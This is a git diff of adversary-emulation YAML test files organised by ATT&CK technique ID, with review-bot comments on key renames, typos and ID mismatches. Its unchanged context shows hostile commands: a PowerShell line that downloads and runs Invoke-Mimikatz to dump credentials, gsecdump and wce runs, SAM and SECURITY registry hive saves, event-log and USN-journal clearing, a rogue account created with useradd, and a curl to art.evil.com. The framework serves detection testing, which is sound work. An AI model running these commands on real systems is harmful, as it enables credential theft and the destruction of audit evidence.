diff --git a/.DS_Store b/.DS_Store new file mode 100644 index 00000000..b44f269c Binary files /dev/null and b/.DS_Store differ diff --git a/atomics/T1002/T1002.yaml b/atomics/T1002/T1002.yaml index 93950e31..35167ada 100644 --- a/atomics/T1002/T1002.yaml +++ b/atomics/T1002/T1002.yaml @@ -27,7 +27,7 @@ atomic_tests: TODO supported_platforms: - windows - input_argument: + input_arguments: input_file: description: Path that should be compressed into our output file type: Path @@ -44,11 +44,9 @@ atomic_tests: - name: Data Compressed - nix description: | TODO - supported_platforms: - linux - macos - executor: name: sh command: | diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml index 2226eac7..a833cda1 100644 --- a/atomics/T1003/T1003.yaml +++ b/atomics/T1003/T1003.yaml @@ -13,7 +13,7 @@ atomic_tests: description: URL to a remote Mimikatz script that dumps credentials type: Url default: https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 - executor: + executor: name: powershell command: | IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds @@ -23,7 +23,7 @@ atomic_tests: https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5 supported_platforms: - windows - executor: + executor: name: command_prompt command: | gsecdump -a 
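Review bot: The new binary file `.DS_Store` is macOS Finder metadata and does not belong in the repository; drop it from this commit and add `.DS_Store` to `.gitignore` so it is not re-added later. It carries no reviewable content and only adds noise to future diffs.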
@@ -33,26 +33,25 @@ atomic_tests: http://www.ampliasecurity.com/research/windows-credentials-editor/ supported_platforms: - windows - input_argument: + input_arguments: output_file: description: Path where resulting data should be placed type: Path default: output.txt - executor: + executor: name: command_prompt command: | wce -o #{output_file} - name: Registry dump of SAM, creds, and secrets description: | - Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated + Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7 supported_platforms: - windows - executor: + executor: name: command_prompt command: | - reg save HKLM\sam sam + reg save HKLM\sam sam reg save HKLM\system system reg save HKLM\security security - diff --git a/atomics/T1007/T1007.yaml b/atomics/T1007/T1007.yaml index 14219028..ace23084 100644 --- a/atomics/T1007/T1007.yaml +++ b/atomics/T1007/T1007.yaml @@ -11,7 +11,7 @@ atomic_tests: - windows input_arguments: - servicename: + service_name: description: Name of service to start stop, query type: string default: svchost.exe diff --git a/atomics/T1028/T1028.yaml b/atomics/T1028/T1028.yaml index 883ae0d4..6342ac94 100644 --- a/atomics/T1028/T1028.yaml +++ b/atomics/T1028/T1028.yaml @@ -27,7 +27,7 @@ atomic_tests: - windows input_arguments: - computername: + computer_name: description: Name of Computer type: string default: computer1 diff --git a/atomics/T1033/T1033.yaml b/atomics/T1033/T1033.yaml index 438a4281..639eb0a8 100644 --- a/atomics/T1033/T1033.yaml +++ b/atomics/T1033/T1033.yaml @@ -10,7 +10,7 @@ atomic_tests: - windows input_arguments: - computername: + computer_name: description: Name of remote computer type: strong default: computer1 
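Review bot: Renaming the argument key `servicename` to `service_name` also changes the placeholder the executor must reference (`#{service_name}`), but the executor block for this test lies outside the hunk, so I cannot see whether its old `#{servicename}` reference was updated; if it was not, the substitution silently stops working. The same concern applies to `computername` → `computer_name` in T1028, T1033 and T1124, to `UserName`/`Password` → `user_name`/`password` in T1053, and to `passowrd` → `password` in T1048. Grepping each touched file for the old placeholder spelling before merging would settle it.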
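Review bot: `type: strong` on the line directly after the renamed `computer_name:` key in T1033 is a typo for `type: string` that the commit leaves in place; the sibling argument blocks in this diff declare `type: string`. The `type` values are also inconsistently cased across the touched files (`string`, `String`, `Path`, `Url`); if the loader compares them literally, one spelling should be chosen and used throughout.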
diff --git a/atomics/T1048/T1048.yaml b/atomics/T1048/T1048.yaml index d7c6aa09..8ab2033c 100644 --- a/atomics/T1048/T1048.yaml +++ b/atomics/T1048/T1048.yaml @@ -24,7 +24,7 @@ atomic_tests: description: username for domain type: string default: atomic - passowrd: + password: description: password for user type: string default: atomic diff --git a/atomics/T1050/T1050.yaml b/atomics/T1050/T1050.yaml index 38434dfd..36cd2050 100644 --- a/atomics/T1050/T1050.yaml +++ b/atomics/T1050/T1050.yaml @@ -20,8 +20,6 @@ atomic_tests: supported_platforms: - windows - input_arguments: - executor: name: powershell command: | diff --git a/atomics/T1053/T1053.yaml b/atomics/T1053/T1053.yaml index 9ca0a045..9484ef5a 100644 --- a/atomics/T1053/T1053.yaml +++ b/atomics/T1053/T1053.yaml @@ -54,11 +54,11 @@ atomic_tests: description: Target type: String default: localhost - UserName: + user_name: description: Username DOMAIN\User type: String default: DOMAIN\user - Password: + password: description: Password type: String default: At0micStrong diff --git a/atomics/T1070/T1070.yaml b/atomics/T1070/T1070.yaml index 1c5e738e..c9319649 100644 --- a/atomics/T1070/T1070.yaml +++ b/atomics/T1070/T1070.yaml @@ -6,7 +6,6 @@ atomic_tests: - name: Clear Logs description: | Clear Windows Event Logs - supported_platforms: - windows input_arguments: @@ -14,33 +13,25 @@ atomic_tests: description: Windows Log Name, ex System type: String default: System - executor: name: command_prompt command: | evtutil cl #{log_name} - - name: FSUtil description: | Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. - supported_platforms: - windows - input_arguments: - executor: name: command_prompt command: | fsutil usn deletejournal /D C: - - name: rm -rf description: | Delete system and audit logs - supported_platforms: - macos - linux - executor: name: sh command: | 
diff --git a/atomics/T1085/T1085.yaml b/atomics/T1085/T1085.yaml index b7546064..d6a37515 100644 --- a/atomics/T1085/T1085.yaml +++ b/atomics/T1085/T1085.yaml @@ -1,3 +1,4 @@ +--- attack_technique: T1085 display_name: Rundll32 atomic_tests: diff --git a/atomics/T1087/T1087.yaml b/atomics/T1087/T1087.yaml index 747f138c..95b599c3 100644 --- a/atomics/T1087/T1087.yaml +++ b/atomics/T1087/T1087.yaml @@ -68,7 +68,7 @@ atomic_tests: supported_platforms: - linux - macos - args: + input_arguments: output_file: description: Path where captured results will be placed type: Path diff --git a/atomics/T1098/T1098.yaml b/atomics/T1098/T1098.yaml index 43baa340..05886865 100644 --- a/atomics/T1098/T1098.yaml +++ b/atomics/T1098/T1098.yaml @@ -6,12 +6,8 @@ atomic_tests: - name: Admin Account Manipulate description: | Manipulate Admin Account Name - supported_platforms: - windows - - input_arguments: - executor: name: powershell command: | diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index 7f089be6..c4b29d73 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml @@ -1,7 +1,7 @@ --- -attack_technique: t1105 +attack_technique: T1105 display_name: Remote File Copy - + atomic_tests: - name: xxxx description: | @@ -9,7 +9,7 @@ atomic_tests: supported_platforms: - linux - macos - executor: + executor: name: bash command: | ### TODO: Not sure how to handle commands that need to be run on multiple systems diff --git a/atomics/T1117/T1117.yaml b/atomics/T1117/T1117.yaml index 7a216646..b801b26c 100644 --- a/atomics/T1117/T1117.yaml +++ b/atomics/T1117/T1117.yaml @@ -1,3 +1,4 @@ +--- attack_technique: T1117 display_name: Regsvr32 atomic_tests: diff --git a/atomics/T1118/T1118.yaml b/atomics/T1118/T1118.yaml index 7b52837b..7f9c9f89 100644 --- a/atomics/T1118/T1118.yaml +++ b/atomics/T1118/T1118.yaml @@ -1,3 +1,4 @@ +--- attack_technique: T1118 display_name: InstallUtil 
diff --git a/atomics/T1121/T1121.yaml b/atomics/T1121/T1121.yaml index 304149a9..d510af56 100644 --- a/atomics/T1121/T1121.yaml +++ b/atomics/T1121/T1121.yaml @@ -1,3 +1,4 @@ +--- attack_technique: T1121 display_name: RegSvcs/RegAsm diff --git a/atomics/T1124/T1124.yaml b/atomics/T1124/T1124.yaml index 0af7b43f..95c5e025 100644 --- a/atomics/T1124/T1124.yaml +++ b/atomics/T1124/T1124.yaml @@ -11,7 +11,7 @@ atomic_tests: - windows input_arguments: - computername: + computer_name: description: computer name to query type: string default: computer1 diff --git a/atomics/T1127/T1127.yaml b/atomics/T1127/T1127.yaml index 287d94b1..a66b9942 100644 --- a/atomics/T1127/T1127.yaml +++ b/atomics/T1127/T1127.yaml @@ -1,3 +1,4 @@ +--- attack_technique: T1127 display_name: Trusted Developer Utilities atomic_tests: diff --git a/atomics/T1130/T1130.yaml b/atomics/T1130/T1130.yaml index deb6f7a5..ffb45f99 100644 --- a/atomics/T1130/T1130.yaml +++ b/atomics/T1130/T1130.yaml @@ -1,14 +1,14 @@ --- -attack_technique: t1130 +attack_technique: T1130 display_name: Install Root Certificate - + atomic_tests: - name: Install root CA on CentOS/RHEL description: | Creates a root CA with openssl supported_platforms: - linux - args: + input_arguments: key_filename: description: Key we create that is used to create the CA certificate type: Path @@ -17,7 +17,7 @@ atomic_tests: description: Path of the CA certificate we create type: Path default: rootCA.crt - executor: + executor: name: sh command: | openssl genrsa -out #{key_filename} 4096 @@ -37,4 +37,4 @@ atomic_tests: # To test the new trust, apply the root certificate or another signed with it to # a SSL/TLS web service and attempt a connection with curl or wget. # -# curl https://art.evil.com \ No newline at end of file +# curl https://art.evil.com diff --git a/atomics/T1136/T1136.yaml b/atomics/T1136/T1136.yaml index 0679a59b..09da49e7 100644 --- a/atomics/T1136/T1136.yaml +++ b/atomics/T1136/T1136.yaml 
@@ -1,7 +1,7 @@ --- -attack_technique: t1136 +attack_technique: T1136 display_name: Create Account - + atomic_tests: - name: Create a user account on a Linux system description: | @@ -9,15 +9,15 @@ atomic_tests: supported_platforms: - linux input_arguments: - username: + username: description: Username of the user to create type: String default: evil_user - comment: + comment: description: Comment to record when creating the user type: String default: Evil Account - executor: + executor: name: bash command: | useradd -M -N -r -s /bin/bash -c "#{comment}" #{username} @@ -27,16 +27,16 @@ atomic_tests: Creates a user on a MacOS system with dscl supported_platforms: - macos - args: - username: + input_arguments: + username: description: Username of the user to create type: String default: evil_user - realname: + realname: description: "'realname' to record when creating the user" type: String default: Evil Account - executor: + executor: name: bash command: | dscl . -create /Users/#{username} diff --git a/atomics/T1139/T1139.yaml b/atomics/T1139/T1139.yaml index 41ce03b0..9f1685e8 100644 --- a/atomics/T1139/T1139.yaml +++ b/atomics/T1139/T1139.yaml @@ -1,7 +1,7 @@ --- -attack_technique: t1139 +attack_technique: T1139 display_name: Bash History - + atomic_tests: - name: xxxx description: | @@ -10,7 +10,7 @@ atomic_tests: - linux - macos input_arguments: - bash_history_filename: + bash_history_filename: description: Path of the bash history file to capture type: Path default: ~/.bash_history diff --git a/atomics/T1148/T1148.yaml b/atomics/T1148/T1148.yaml index f69f79d0..d95d2623 100644 --- a/atomics/T1148/T1148.yaml +++ b/atomics/T1148/T1148.yaml @@ -1,5 +1,5 @@ --- -attack_technique: t1146 +attack_technique: T1146 display_name: HISTCONTROL atomic_tests: diff --git a/atomics/T1170/T1170.yaml b/atomics/T1170/T1170.yaml index 8cc1478f..47916540 100644 --- a/atomics/T1170/T1170.yaml +++ b/atomics/T1170/T1170.yaml 
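Review bot: The corrected line `attack_technique: T1146` in `atomics/T1148/T1148.yaml` still disagrees with the directory name and with `display_name: HISTCONTROL`; if the directory is the authoritative technique ID, the commit has only normalised the case of a wrong number and the line should read `attack_technique: T1148`. Any tooling that indexes tests by `attack_technique` would otherwise file this test under a different technique than its path suggests.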
@@ -1,3 +1,4 @@ +--- attack_technique: T1170 display_name: Mshta diff --git a/atomics/T1173/T1173.yaml b/atomics/T1173/T1173.yaml index 6a38bc08..55b6d044 100644 --- a/atomics/T1173/T1173.yaml +++ b/atomics/T1173/T1173.yaml @@ -12,7 +12,6 @@ atomic_tests: executor: name: manual - command: | steps: | Open Microsoft Word diff --git a/atomics/T1179/T1179.yaml b/atomics/T1179/T1179.yaml index 556c0c92..b5e77bb3 100644 --- a/atomics/T1179/T1179.yaml +++ b/atomics/T1179/T1179.yaml @@ -1,3 +1,4 @@ +--- attack_technique: T1179 display_name: Hooking diff --git a/atomics/T1197/T1197.yaml b/atomics/T1197/T1197.yaml index 8ef540f0..53753e6d 100644 --- a/atomics/T1197/T1197.yaml +++ b/atomics/T1197/T1197.yaml @@ -10,7 +10,6 @@ atomic_tests: supported_platforms: - windows - input_arguments: executor: name: command_prompt command: | @@ -21,7 +20,6 @@ atomic_tests: and execute a payload leveraging PowerShell supported_platforms: - windows - input_arguments: executor: name: powershell command: |